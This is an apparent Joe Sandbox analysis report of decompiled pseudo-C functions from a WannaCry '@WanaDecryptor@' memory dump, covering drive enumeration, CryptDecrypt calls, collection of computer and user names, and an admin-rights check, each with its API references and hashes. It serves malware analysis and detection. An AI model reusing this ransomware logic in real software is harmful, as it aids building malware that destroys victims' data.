                                                      											 *((intOrPtr*)(_t236 + 8 + (_t317 + _t276 * 8) * 4)) = _t398;
                                                      											_t395 =  *(_t403 + 0x10);
                                                      											_t214 =  *(_t403 + 0x24) + 1;
                                                      											_t388 = _t388 + 1;
                                                      											 *((intOrPtr*)(_t236 + 0x1e8 + (_t317 + ( *((intOrPtr*)(_t236 + 0x410)) - _t276) * 8) * 4)) =  *((intOrPtr*)(_t375 - 4));
                                                      											 *(_t403 + 0x24) = _t214;
                                                      											if(_t214 < _t395) {
                                                      												continue;
                                                      											}
                                                      											goto L50;
                                                      										}
                                                      										goto L51;
                                                      									}
                                                      									if(_t395 <= 1) {
                                                      										goto L46;
                                                      									}
                                                      									_t101 = _t236 + 0x418; // 0x46c
                                                      									_t215 = _t101;
                                                      									_t278 = _t395 - 1;
                                                      									do {
                                                      										 *_t215 =  *_t215 ^  *(_t215 - 4);
                                                      										_t215 =  &(_t215[1]);
                                                      										_t278 = _t278 - 1;
                                                      									} while (_t278 != 0);
                                                      									goto L46;
                                                      									L50:
                                                      									_t251 =  *(_t403 + 0x2c);
                                                      								} while (_t388 <  *(_t403 + 0x30));
                                                      								goto L51;
                                                      							}
                                                      							_t58 = _t236 + 0x414; // 0x468
                                                      							 *(_t403 + 0x24) = _t58;
                                                      							while(_t388 < _t353) {
                                                      								asm("cdq");
                                                      								_t378 = _t388 / _t251;
                                                      								asm("cdq");
                                                      								_t321 = _t388 % _t251;
                                                      								 *(_t403 + 0x28) = _t321;
                                                      								 *((intOrPtr*)(_t236 + 8 + (_t321 + _t378 * 8) * 4)) =  *( *(_t403 + 0x24));
                                                      								_t388 = _t388 + 1;
                                                      								_t224 =  *(_t403 + 0x24);
                                                      								 *((intOrPtr*)(_t236 + 0x1e8 + ( *(_t403 + 0x28) + ( *((intOrPtr*)(_t236 + 0x410)) - _t378) * 8) * 4)) =  *_t224;
                                                      								_t353 =  *(_t403 + 0x30);
                                                      								 *(_t403 + 0x24) = _t224 + 4;
                                                      								if(_t388 < _t395) {
                                                      									continue;
                                                      								}
                                                      								goto L35;
                                                      							}
                                                      							goto L51;
                                                      						}
                                                      						 *(_t403 + 0x24) = _t395;
                                                      						do {
                                                      							_t387 = _t387 + 4;
                                                      							 *(_t387 - 4) = 0 << 0x18;
                                                      							 *(_t387 - 4) =  *(_t387 - 4) | 0 << 0x00000010;
                                                      							_t189 = _t189 + 4;
                                                      							_t337 =  *(_t403 + 0x24) - 1;
                                                      							 *(_t403 + 0x24) = _t337;
                                                      						} while (_t337 != 0);
                                                      						goto L31;
                                                      					}
                                                      					_t38 = _t236 + 0x1e8; // 0x23c
                                                      					_t391 = _t38;
                                                      					do {
                                                      						if(_t251 > 0) {
                                                      							memset(_t391, 0, _t251 << 2);
                                                      							_t403 = _t403 + 0xc;
                                                      							_t251 =  *(_t403 + 0x2c);
                                                      						}
                                                      						_t293 = _t293 + 1;
                                                      						_t391 = _t391 + 0x20;
                                                      					} while (_t293 <=  *((intOrPtr*)(_t236 + 0x410)));
                                                      					goto L28;
                                                      				} else {
                                                      					_t33 = _t236 + 8; // 0x5c
                                                      					_t392 = _t33;
                                                      					do {
                                                      						if(_t251 > 0) {
                                                      							memset(_t392, 0, _t251 << 2);
                                                      							_t403 = _t403 + 0xc;
                                                      							_t251 =  *(_t403 + 0x2c);
                                                      						}
                                                      						_t292 = _t292 + 1;
                                                      						_t392 = _t392 + 0x20;
                                                      					} while (_t292 <=  *((intOrPtr*)(_t236 + 0x410)));
                                                      					goto L23;
                                                      				}
                                                      			}

                                                      APIs
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT ref: 0040A16F
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A17F
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1A8
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1B8
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1E1
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1F1
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??0exception@@ExceptionThrow
                                                      • String ID:
                                                      • API String ID: 941485209-0
                                                      • Opcode ID: 1e118166748c2516ccf34b16e56ce24d223970c5c76bb6d30bfc94f2d512404d
                                                      • Instruction ID: fb0ef9a6f766abd1277d4fb3e7775c965cb771230ee66441beda5a672c207522
                                                      • Opcode Fuzzy Hash: 1e118166748c2516ccf34b16e56ce24d223970c5c76bb6d30bfc94f2d512404d
                                                      • Instruction Fuzzy Hash: 57E1E4716043458BD718CF29C4906AAB7E2BFCC308F09857EE889EB355DB34D941CB5A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00403A20(intOrPtr _a4, intOrPtr _a8) {
                                                      				union _ULARGE_INTEGER _v8;
                                                      				union _ULARGE_INTEGER _v16;
                                                      				intOrPtr _v20;
                                                      				union _ULARGE_INTEGER _v24;
                                                      				short _v28;
                                                      				short _v32;
                                                      				short _t23;
                                                      				short _t34;
                                                      				signed int _t47;
                                                      				unsigned int _t50;
                                                      
                                                      				if( *((intOrPtr*)(_a8 + 8)) != 0) {
                                                      					return 1;
                                                      				} else {
                                                      					_t50 = GetLogicalDrives();
                                                      					_t47 = 2;
                                                      					do {
                                                      						if((_t50 >> _t47 & 0x00000001) != 0) {
                                                      							_t23 =  *L" : "; // 0x3a0020
                                                      							_t34 =  *0x420760; // 0x20
                                                      							_v32 = _t23;
                                                      							_t7 = _t47 + 0x41; // 0x43
                                                      							_v28 = _t34;
                                                      							_v32 = _t7;
                                                      							_v28 = 0x5c;
                                                      							if(GetDriveTypeW( &_v32) != 5 && GetDiskFreeSpaceExW( &_v32,  &_v8,  &_v24,  &_v16) != 0 && (_v20 > 0 || _v24.LowPart > 0)) {
                                                      								_v28 = 0;
                                                      								E004026B0(_a4,  &_v32);
                                                      							}
                                                      						}
                                                      						_t47 = _t47 + 1;
                                                      					} while (_t47 <= 0x19);
                                                      					return 1;
                                                      				}
                                                      			}













                                                      APIs
                                                      • GetLogicalDrives.KERNEL32 ref: 00403A35
                                                      • GetDriveTypeW.KERNEL32 ref: 00403A7A
                                                      • GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DiskDriveDrivesFreeLogicalSpaceType
                                                      • String ID: : $\
                                                      • API String ID: 222820107-856521285
                                                      • Opcode ID: 8d838ba2e6f39d2646f0809dd41db9d52f5210801079b522eea1ca76c3ac80bf
                                                      • Instruction ID: 7a2fb974cbacd17fa61847377d7cab912bc040039a87a27a6beb81165ce83d4b
                                                      • Opcode Fuzzy Hash: 8d838ba2e6f39d2646f0809dd41db9d52f5210801079b522eea1ca76c3ac80bf
                                                      • Instruction Fuzzy Hash: 2D116D31614301ABD315DF15D884AABBBE8FBC8710F04882EF88597290E775E948CB9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 96%
                                                      			E0040D300(intOrPtr* __ecx, void* _a4, void* _a8, void* _a12, void* _a16) {
                                                      				void _v1024;
                                                      				char _v1028;
                                                      				intOrPtr _v1032;
                                                      				intOrPtr _v1036;
                                                      				void* _v1040;
                                                      				intOrPtr _v1044;
                                                      				char _v1048;
                                                      				signed int _t34;
                                                      				void* _t36;
                                                      				intOrPtr _t37;
                                                      				void* _t43;
                                                      				void* _t45;
                                                      				intOrPtr _t46;
                                                      				void* _t49;
                                                      				signed int _t58;
                                                      				intOrPtr* _t60;
                                                      				signed int _t70;
                                                      				signed int _t71;
                                                      				signed int _t78;
                                                      				void* _t83;
                                                      				void* _t91;
                                                      				void* _t102;
                                                      				void* _t103;
                                                      				void* _t104;
                                                      				void* _t105;
                                                      				void** _t107;
                                                      				void** _t109;
                                                      
                                                      				_t106 =  &_v1040;
                                                      				_t105 = _a8;
                                                      				_t60 = __ecx;
                                                      				_v1032 = 0;
                                                      				if(_t105 != 0) {
                                                      					_t34 = E0040D5D0(__ecx);
                                                      					__eflags = _t34;
                                                      					if(_t34 != 0) {
                                                      						__eflags = _a12;
                                                      						if(_a12 == 0) {
                                                      							_t36 = _a4;
                                                      							_v1040 = _t36;
                                                      							_t91 = _t36;
                                                      							goto L13;
                                                      						} else {
                                                      							__eflags = _a16;
                                                      							if(_a16 != 0) {
                                                      								__eflags = _t105 - 0x400;
                                                      								if(_t105 > 0x400) {
                                                      									_t49 = E00412A90(_t105);
                                                      									_t109 =  &(( &_v1040)[1]);
                                                      									_v1040 = _t49;
                                                      									__eflags = _t49;
                                                      									if(_t49 != 0) {
                                                      										_t103 = _a4;
                                                      										_t70 = _t105;
                                                      										_t71 = _t70 >> 2;
                                                      										memcpy(_t49, _t103, _t71 << 2);
                                                      										memcpy(_t103 + _t71 + _t71, _t103, _t70 & 0x00000003);
                                                      										_t106 =  &(_t109[6]);
                                                      										_t91 = _v1040;
                                                      										E0040D2B0(_t60, _t91, _t105);
                                                      										goto L13;
                                                      									} else {
                                                      										return _t49;
                                                      									}
                                                      								} else {
                                                      									_t104 = _a4;
                                                      									_t78 = _t105 >> 2;
                                                      									memcpy(_t104 + _t78 + _t78, _t104, memcpy( &_v1024, _t104, _t78 << 2) & 0x00000003);
                                                      									_t106 =  &(( &_v1040)[6]);
                                                      									_t83 =  &_v1024;
                                                      									_t91 = _t83;
                                                      									_v1040 = _t83;
                                                      									E0040D2B0(_t60, _t91, _t105);
                                                      									goto L13;
                                                      								}
                                                      							} else {
                                                      								_t91 = _a4;
                                                      								E0040D2B0(__ecx, _t91, _t105);
                                                      								L13:
                                                      								_push( &_v1028);
                                                      								L0041303E();
                                                      								_t37 = _v1028;
                                                      								_t107 =  &(_t106[1]);
                                                      								_t102 = 0;
                                                      								_v1036 = _t37;
                                                      								__eflags = _t105;
                                                      								if(_t105 > 0) {
                                                      									while(1) {
                                                      										__eflags = _t37 - _v1028 -  *((intOrPtr*)(_t60 + 0x28));
                                                      										if(_t37 - _v1028 >  *((intOrPtr*)(_t60 + 0x28))) {
                                                      											goto L25;
                                                      										}
                                                      										_t43 =  *((intOrPtr*)( *_t60 + 0x20))( *((intOrPtr*)(_t60 + 4)), _t91 + _t102, _t105 - _t102);
                                                      										__eflags = _t43;
                                                      										if(__eflags > 0) {
                                                      											_t102 = _t102 + _t43;
                                                      											__eflags = _t102;
                                                      											_push( &_v1048);
                                                      											goto L24;
                                                      										} else {
                                                      											if(__eflags != 0) {
                                                      												_t45 =  *((intOrPtr*)( *_t60 + 0x28))();
                                                      												__eflags = _t45 - 0x2733;
                                                      												if(_t45 == 0x2733) {
                                                      													_t46 = _v1044;
                                                      													__eflags = _t46 - 0x64;
                                                      													_v1044 = _t46 + 1;
                                                      													if(_t46 > 0x64) {
                                                      														Sleep(0x64);
                                                      														_v1044 = 0;
                                                      													}
                                                      													_push( &_v1048);
                                                      													L24:
                                                      													L0041303E();
                                                      													_t107 =  &(_t107[1]);
                                                      													__eflags = _t102 - _t105;
                                                      													if(_t102 < _t105) {
                                                      														_t37 = _v1048;
                                                      														continue;
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      										goto L25;
                                                      									}
                                                      								}
                                                      								L25:
                                                      								__eflags = _t91 - _a4;
                                                      								if(_t91 != _a4) {
                                                      									__eflags = _t91 -  &_v1024;
                                                      									if(_t91 !=  &_v1024) {
                                                      										__eflags = _t91;
                                                      										if(_t91 != 0) {
                                                      											free(_t91);
                                                      										}
                                                      									}
                                                      								}
                                                      								return _t102;
                                                      							}
                                                      						}
                                                      					} else {
                                                      						_t58 = _t34 | 0xffffffff;
                                                      						__eflags = _t58;
                                                      						return _t58;
                                                      					}
                                                      				} else {
                                                      					return 0;
                                                      				}
                                                      			}






























                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c8f85ea80c3b6b8e9e311ac575965a537163168bbe12e9f95371609f99db3755
                                                      • Instruction ID: 8719850658187d05665d4daca0cd16b7f92190a52f2d7545724c4cd71ae93cac
                                                      • Opcode Fuzzy Hash: c8f85ea80c3b6b8e9e311ac575965a537163168bbe12e9f95371609f99db3755
                                                      • Instruction Fuzzy Hash: 7A41D7B2B042044BC724DE6898506BFB7D5EBD4314F40093FF946A3381DA79ED4D869A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 76%
                                                      			E00404AF0(void* __ecx, void* _a4, int _a8) {
                                                      				intOrPtr* _v4;
                                                      				void* _v8;
                                                      				signed int _v12;
                                                      				int _t12;
                                                      				void* _t19;
                                                      				signed int _t22;
                                                      				signed int _t23;
                                                      				struct _CRITICAL_SECTION* _t30;
                                                      				void* _t36;
                                                      
                                                      				_t19 = __ecx;
                                                      				if( *((intOrPtr*)(__ecx + 8)) != 0) {
                                                      					_t2 = _t19 + 0x10; // 0x14
                                                      					_t30 = _t2;
                                                      					EnterCriticalSection(_t30);
                                                      					_t36 = _a4;
                                                      					_t12 = CryptDecrypt( *(_t19 + 8), 0, 1, 0, _t36,  &_a8);
                                                      					_push(_t30);
                                                      					if(_t12 != 0) {
                                                      						LeaveCriticalSection();
                                                      						_t22 = _v12;
                                                      						_t23 = _t22 >> 2;
                                                      						memcpy(_v8, _t36, _t23 << 2);
                                                      						 *_v4 = memcpy(_t36 + _t23 + _t23, _t36, _t22 & 0x00000003);
                                                      						return 1;
                                                      					} else {
                                                      						LeaveCriticalSection();
                                                      						return 0;
                                                      					}
                                                      				} else {
                                                      					return 0;
                                                      				}
                                                      			}

                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(00000014,00000000,00000000,00000000,0040234D,?,00000100,?,?), ref: 00404B08
                                                      • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,?,?), ref: 00404B22
                                                      • LeaveCriticalSection.KERNEL32(00000014), ref: 00404B2D
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$CryptDecryptEnterLeave
                                                      • String ID:
                                                      • API String ID: 1395129968-0
                                                      • Opcode ID: d5df251600a2380ab54480b0f3f02b47ff305855cea17aa335da23d14111fa1b
                                                      • Instruction ID: c9397fa3391ecaa6db63de0f595bcff8412a7be4ee2956e3e45acdf047351e7f
                                                      • Opcode Fuzzy Hash: d5df251600a2380ab54480b0f3f02b47ff305855cea17aa335da23d14111fa1b
                                                      • Instruction Fuzzy Hash: 15017C323002049BD714CE65E888BAB77A9FBC9721F44883AFA42D7281D7B0E809C671
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 60%
                                                      			E0040BED0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
                                                      				char _v0;
                                                      				char _v4;
                                                      				intOrPtr _v12;
                                                      				intOrPtr _v36;
                                                      				void _v311;
                                                      				char _v312;
                                                      				char _v332;
                                                      				char _v572;
                                                      				void _v611;
                                                      				char _v612;
                                                      				intOrPtr _v616;
                                                      				long _v620;
                                                      				char _v633;
                                                      				intOrPtr _t29;
                                                      				signed int _t30;
                                                      				signed int _t32;
                                                      				signed int _t50;
                                                      				char _t51;
                                                      				char _t54;
                                                      				signed int _t67;
                                                      				intOrPtr _t83;
                                                      
                                                      				_t29 =  *[fs:0x0];
                                                      				_t50 =  *0x422210; // 0xab4238
                                                      				_push(0xffffffff);
                                                      				_push(E0041429E);
                                                      				_push(_t29);
                                                      				 *[fs:0x0] = _t83;
                                                      				if(_t50 != 0) {
                                                      					_t29 =  *((intOrPtr*)( *_t50 + 0xc))();
                                                      					_t67 =  *0x422210; // 0xab4238
                                                      					if(_t67 != 0) {
                                                      						_t29 =  *((intOrPtr*)( *_t67))(1);
                                                      					}
                                                      				}
                                                      				_push(0x2c);
                                                      				L00412CEC();
                                                      				_v616 = _t29;
                                                      				_v4 = 0;
                                                      				if(_t29 == 0) {
                                                      					_t30 = 0;
                                                      				} else {
                                                      					_t30 = E0040D5E0(_t29);
                                                      				}
                                                      				_v4 = 0xffffffff;
                                                      				 *0x422210 = _t30;
                                                      				if(_t30 != 0) {
                                                      					_push(_a4);
                                                      					_t32 = E0040BAF0();
                                                      					if(_t32 == 0) {
                                                      						_t51 =  *0x421798; // 0x0
                                                      						_v612 = _t51;
                                                      						memset( &_v611, 0, 0x4a << 2);
                                                      						asm("stosw");
                                                      						asm("stosb");
                                                      						_v620 = 0x12b;
                                                      						GetComputerNameA( &_v612,  &_v620);
                                                      						_t54 =  *0x421798; // 0x0
                                                      						_v312 = _t54;
                                                      						memset( &_v311, 0, 0x4a << 2);
                                                      						asm("stosw");
                                                      						asm("stosb");
                                                      						_v572 = 0;
                                                      						_v620 = 0x12b;
                                                      						GetUserNameA( &_v312,  &_v620);
                                                      						_push(8);
                                                      						_push(_a8);
                                                      						E0040DC00(_a16);
                                                      						E0040DD00(_a16,  &_v620);
                                                      						_push(1);
                                                      						_push( &_v633);
                                                      						_v633 = _v0;
                                                      						E0040DC00(_a16);
                                                      						E0040DD00(_a16,  &_v332);
                                                      						 *[fs:0x0] = _v36;
                                                      						return 0;
                                                      					} else {
                                                      						 *[fs:0x0] = _v12;
                                                      						return _t32 | 0xffffffff;
                                                      					}
                                                      				} else {
                                                      					 *[fs:0x0] = _v12;
                                                      					return _t30 | 0xffffffff;
                                                      				}
                                                      			}

                                                      APIs
                                                      • #823.MFC42(0000002C), ref: 0040BF0C
                                                      • GetComputerNameA.KERNEL32(?,?), ref: 0040BFB9
                                                      • GetUserNameA.ADVAPI32 ref: 0040BFF5
                                                        • Part of subcall function 0040DC00: ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040DC9E
                                                        • Part of subcall function 0040DC00: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040DCAD
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Name$#823??0exception@@ComputerExceptionThrowUser
                                                      • String ID:
                                                      • API String ID: 2582426243-0
                                                      • Opcode ID: dfb134e3e20c56f6c43c465dd7d0b2bdc90d3be31fa2d905cc250f6dcb77a9ab
                                                      • Instruction ID: 83e3db62829b85d845063e2f81586b9f479c5ffe1e9c48acb6c19853c4e1520f
                                                      • Opcode Fuzzy Hash: dfb134e3e20c56f6c43c465dd7d0b2bdc90d3be31fa2d905cc250f6dcb77a9ab
                                                      • Instruction Fuzzy Hash: 8541C2706087829BD720DF64D854BAB7BE4EBC8710F004A3DF599933D0DB789508CB9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 93%
                                                      			E0040D4C0() {
                                                      				void* __ecx;
                                                      				signed int _t17;
                                                      				intOrPtr _t19;
                                                      				signed int _t28;
                                                      				void* _t29;
                                                      				signed int _t30;
                                                      				signed int _t31;
                                                      				signed int _t33;
                                                      				intOrPtr* _t34;
                                                      				signed int _t48;
                                                      				intOrPtr* _t50;
                                                      				signed int _t51;
                                                      				void* _t52;
                                                      				void* _t53;
                                                      
                                                      				_t33 =  *(_t52 + 0x10);
                                                      				_t51 = 0;
                                                      				_t50 = _t34;
                                                      				if(_t33 != 0) {
                                                      					_t17 = E0040D5D0(_t50);
                                                      					__eflags = _t17;
                                                      					if(_t17 != 0) {
                                                      						_push(_t52 + 0xc);
                                                      						_t48 = 0;
                                                      						L0041303E();
                                                      						_t19 =  *((intOrPtr*)(_t52 + 0x14));
                                                      						_t53 = _t52 + 4;
                                                      						__eflags = _t33;
                                                      						 *((intOrPtr*)(_t53 + 0x1c)) = _t19;
                                                      						if(_t33 > 0) {
                                                      							while(1) {
                                                      								__eflags = _t19 -  *((intOrPtr*)(_t53 + 0x10)) -  *((intOrPtr*)(_t50 + 0x28));
                                                      								if(_t19 -  *((intOrPtr*)(_t53 + 0x10)) >  *((intOrPtr*)(_t50 + 0x28))) {
                                                      									goto L16;
                                                      								}
                                                      								_t28 =  *((intOrPtr*)( *_t50 + 0x24))( *((intOrPtr*)(_t50 + 4)), _t48 +  *((intOrPtr*)(_t53 + 0x18)), _t33 - _t48);
                                                      								__eflags = _t28;
                                                      								if(__eflags > 0) {
                                                      									_t48 = _t48 + _t28;
                                                      									__eflags = _t48;
                                                      									_push(_t53 + 0x1c);
                                                      									goto L15;
                                                      								} else {
                                                      									if(__eflags != 0) {
                                                      										_t29 =  *((intOrPtr*)( *_t50 + 0x28))();
                                                      										__eflags = _t29 - 0x2733;
                                                      										if(_t29 == 0x2733) {
                                                      											_t30 = _t51;
                                                      											_t51 = _t51 + 1;
                                                      											__eflags = _t30 - 0x64;
                                                      											if(_t30 > 0x64) {
                                                      												Sleep(0x64);
                                                      												_t51 = 0;
                                                      												__eflags = 0;
                                                      											}
                                                      											_push(_t53 + 0x1c);
                                                      											L15:
                                                      											L0041303E();
                                                      											_t53 = _t53 + 4;
                                                      											__eflags = _t48 - _t33;
                                                      											if(_t48 < _t33) {
                                                      												_t19 =  *((intOrPtr*)(_t53 + 0x1c));
                                                      												continue;
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      								goto L16;
                                                      							}
                                                      						}
                                                      						L16:
                                                      						__eflags =  *(_t53 + 0x20);
                                                      						if( *(_t53 + 0x20) != 0) {
                                                      							E0040D2B0(_t50,  *((intOrPtr*)(_t53 + 0x18)), _t48);
                                                      						}
                                                      						return _t48;
                                                      					} else {
                                                      						_t31 = _t17 | 0xffffffff;
                                                      						__eflags = _t31;
                                                      						return _t31;
                                                      					}
                                                      				} else {
                                                      					return 0;
                                                      				}
                                                      			}

                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5e68fbcf5b22235d79db144bb8702833b1e0f7456deab8b0abe335e8fb721804
                                                      • Instruction ID: 4ffb44c4908fbcdbada2a4de5981d2af022f8853c63cab2f762cb5961de049d3
                                                      • Opcode Fuzzy Hash: 5e68fbcf5b22235d79db144bb8702833b1e0f7456deab8b0abe335e8fb721804
                                                      • Instruction Fuzzy Hash: B121B172B042016FC314DF99AC84C6BB399EBD8358B104A3FF946D7381DA35DC09879A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E00401BB0() {
                                                      				char _v3;
                                                      				char _v4;
                                                      				char _v5;
                                                      				char _v6;
                                                      				char _v7;
                                                      				struct _SID_IDENTIFIER_AUTHORITY _v8;
                                                      				void* _v12;
                                                      				char _v16;
                                                      				void* _v24;
                                                      				long _v28;
                                                      				int _t16;
                                                      				void* _t17;
                                                      
                                                      				_v8.Value = 0;
                                                      				_v7 = 0;
                                                      				_v6 = 0;
                                                      				_v5 = 0;
                                                      				_v4 = 0;
                                                      				_v3 = 5;
                                                      				_v16 = 0;
                                                      				_t16 = AllocateAndInitializeSid( &_v8, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
                                                      				if(_t16 != 0) {
                                                      					_t17 = _v12;
                                                      					__imp__CheckTokenMembership(0, _t17,  &_v16);
                                                      					if(_t17 == 0) {
                                                      						_v28 = 0;
                                                      					}
                                                      					FreeSid(_v24);
                                                      					return _v28;
                                                      				} else {
                                                      					return _t16;
                                                      				}
                                                      			}

                                                      APIs
                                                      • AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00401BEC
                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000), ref: 00401C06
                                                      • FreeSid.ADVAPI32(?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00401C19
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                      • String ID:
                                                      • API String ID: 3429775523-0
                                                      • Opcode ID: a7a265a1dd536a0e0eab8576597306744b18f24eaa9b8ffe7a6d4444507be078
                                                      • Instruction ID: 94521974df2238a1dc1099b42d01a28c9688a26bfb2bc835d8f4af5c6999d558
                                                      • Opcode Fuzzy Hash: a7a265a1dd536a0e0eab8576597306744b18f24eaa9b8ffe7a6d4444507be078
